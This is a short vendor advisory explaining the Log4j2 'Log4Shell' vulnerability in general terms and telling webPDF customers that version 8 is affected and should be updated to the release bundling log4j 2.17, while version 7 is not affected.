Log4j2 security vulnerabilities – What should webPDF customers be aware of?
Currently, many reports about the log4j2 security vulnerabilities are piling up (More information: log4j website). The BSI (German Federal Office for Information Security) has even published a cyber security warning of warning level red and calls the current situation an “extremely critical threat situation”. Many companies are unsettled and wondering whether they are specifically affected and, if so, how they should best proceed.
About the Log4j2 vulnerabilities
The so-called “Log4Shell” vulnerability affects the widely used Log4j logging library for Java applications.
The logging library is used for high-performance aggregation of an application’s log data. The published vulnerability allows attackers from versions 2.x (up to 2.14.1) to execute their own program code on the target system, which can lead to compromise of the target system. The vulnerability can be trivially exploited by using a special string. The vulnerability can not only be used to load additional malware, but also to exfiltrate confidential data (e.g. environment variables) or in certain circumstances lead to a DoS (Denial of Service) attack.
What should webPDF customers be aware of?
For webPDF customers we recommend the following procedure:
- webPDF 8: uses the library in version 2 and is therefore affected. It is strongly recommended to update to the current webPDF 8 version. Other options are not available.
- webPDF 7: Not affected, because log4j version 1 is used.
Please read our detailed notes in the webPDF blog:
Here you can find our latest security updates:
An update from webPDF 8 to log4j 2.17 is available on the download page with revision 2376. The LINUX packages at https://packages.softvision.de/ and the container “softvisiondev/webpdf” on Docker Hub have also been updated accordingly.